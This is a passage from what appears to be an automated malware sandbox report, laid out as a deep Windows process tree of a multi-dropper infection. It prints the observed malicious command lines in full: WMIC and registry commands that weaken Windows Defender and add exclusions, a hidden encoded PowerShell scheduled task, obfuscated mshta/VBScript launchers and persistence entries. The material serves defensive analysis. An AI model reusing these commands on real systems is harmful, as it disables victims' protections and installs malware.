                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                      PID:7508
                                                                                                                                                                                      • C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        PID:9884
                                                                                                                                                                                        • C:\Users\Admin\Documents\2y2dpyBIo0eBGvITmCD5w9i3.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\2y2dpyBIo0eBGvITmCD5w9i3.exe"
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:3760
                                                                                                                                                                                          • C:\Users\Admin\Documents\1xJ3KHmFHppradNtzQPCUavg.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\1xJ3KHmFHppradNtzQPCUavg.exe"
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:7012
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCEEA.tmp\Install.exe
                                                                                                                                                                                                .\Install.exe
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:4524
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSD1A9.tmp\Install.exe
                                                                                                                                                                                                    .\Install.exe /S /site_id "668658"
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                    PID:6708
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:8700
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                          PID:8580
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:10460
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                  PID:11124
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                      PID:4920
                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                  PID:6872
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                      PID:744
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                          PID:4544
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                              PID:11624
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                          PID:11908
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                              PID:17064
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                  PID:17076
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                      PID:16852
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                  PID:11972
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                      PID:16868
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                          PID:11188
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                              PID:15720
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                        PID:5280
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                            PID:10896
                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                PID:12176
                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:1180
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                PID:10492
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                  PID:4752
                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                      PID:12204
                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                        PID:9572
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /CREATE /TN "gydHPhxEz" /SC once /ST 06:06:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:11060
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /run /I /tn "gydHPhxEz"
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                      PID:11920
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "gydHPhxEz"
                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                        PID:12504
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /CREATE /TN "bEwGusBEGbIeKSSfjR" /SC once /ST 21:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe\" XY /site_id 668658 /S" /V1 /F
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                        PID:12348
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                        schtasks /run /I /tn "bEwGusBEGbIeKSSfjR"
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:15292
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                      PID:9608
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\kvXppC1RJ_LmP970tG_k_8kU.exe"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                        PID:16744
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                        PID:1604
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF """" =="""" for %q In (""C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:9976
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "" =="" for %q In ("C:\Users\Admin\Documents\U0_ScxFgwNG5I8y9H9sWqx5C.exe" ) do taskkill -iM "%~nxq" /f
                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                PID:1840
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe
                                                                                                                                                                                                                                                                  roBCqJOQYC.eXe -P0_6X2fnCLFU6G
                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                    PID:7076
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vBSCRiPT: closE ( creatEOBJeCT( "WscriPT.shEll"). RUN ("C:\Windows\system32\cmd.exe /C COpy /y ""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G & iF ""-P0_6X2fnCLFU6G"" =="""" for %q In (""C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe"" ) do taskkill -iM ""%~nxq"" /f " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                        PID:10272
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C COpy /y "C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" rOBCqJoQYC.eXe && sTArT roBCqJOQYC.eXe -P0_6X2fnCLFU6G& iF "-P0_6X2fnCLFU6G" =="" for %q In ("C:\Users\Admin\AppData\Local\Temp\rOBCqJoQYC.eXe" ) do taskkill -iM "%~nxq" /f
                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                            PID:9384
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" .\LcGE3.T_v,mPHYMXZs
                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:1148
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        taskkill -iM "U0_ScxFgwNG5I8y9H9sWqx5C.exe" /f
                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                        PID:11152
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\HcY5k_KrNgbxj3FPdJLM6vgP.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\HcY5k_KrNgbxj3FPdJLM6vgP.exe"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                  PID:5664
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\HqrDkLy8rEXTDVd9BAng1BxY.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\HqrDkLy8rEXTDVd9BAng1BxY.exe"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:9780
                                                                                                                                                                                                                                                                    • C:\ProgramData\7714914.exe
                                                                                                                                                                                                                                                                      "C:\ProgramData\7714914.exe"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:2104
                                                                                                                                                                                                                                                                      • C:\ProgramData\8626517.exe
                                                                                                                                                                                                                                                                        "C:\ProgramData\8626517.exe"
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                        PID:5180
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\xMG1YvfSVxm8eGMk6qzGDXsN.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\xMG1YvfSVxm8eGMk6qzGDXsN.exe" /mixtwo
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                        PID:6996
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                          PID:11016
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V6JFQ.tmp\4J_1KMFJgm5oelcgvSUkuzC9.tmp
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-V6JFQ.tmp\4J_1KMFJgm5oelcgvSUkuzC9.tmp" /SL5="$1071E,506127,422400,C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"
                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                              PID:11204
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-6DLA5.tmp\Chmenka.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-6DLA5.tmp\Chmenka.exe" /S /UID=124
                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                PID:13144
                                                                                                                                                                                                                                                                                • C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                    PID:8020
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-O26LI.tmp\IDownload.tmp
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-O26LI.tmp\IDownload.tmp" /SL5="$107A8,994212,425984,C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                      PID:10396
                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\IDownload\IDownload.App.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        PID:11200
                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3y-ujjsh.cmdline"
                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                            PID:11316
                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
                                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF317.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF316.tmp"
                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                PID:18748
                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                              dw20.exe -x -s 1384
                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                PID:7868
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\69-6b3b1-e43-93b9c-8ac0f6df16aab\Wesefesikae.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\69-6b3b1-e43-93b9c-8ac0f6df16aab\Wesefesikae.exe"
                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                          PID:10296
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\c5-a3148-a84-a9cb4-2cb93ad848d04\SHexeshushufi.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\c5-a3148-a84-a9cb4-2cb93ad848d04\SHexeshushufi.exe"
                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                            PID:6004
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                PID:17884
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                    PID:7396
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                    PID:18672
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                        PID:11512
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe & exit
                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                        PID:19136
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe
                                                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                                                            PID:11076
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                            PID:18804
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                PID:11448
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jrx2ov3.d3n\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                              PID:4932
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\VgxjiSGx9LEXIJ_mHyRpHj7y.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\VgxjiSGx9LEXIJ_mHyRpHj7y.exe"
                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                        PID:7728
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                                                      8⤵
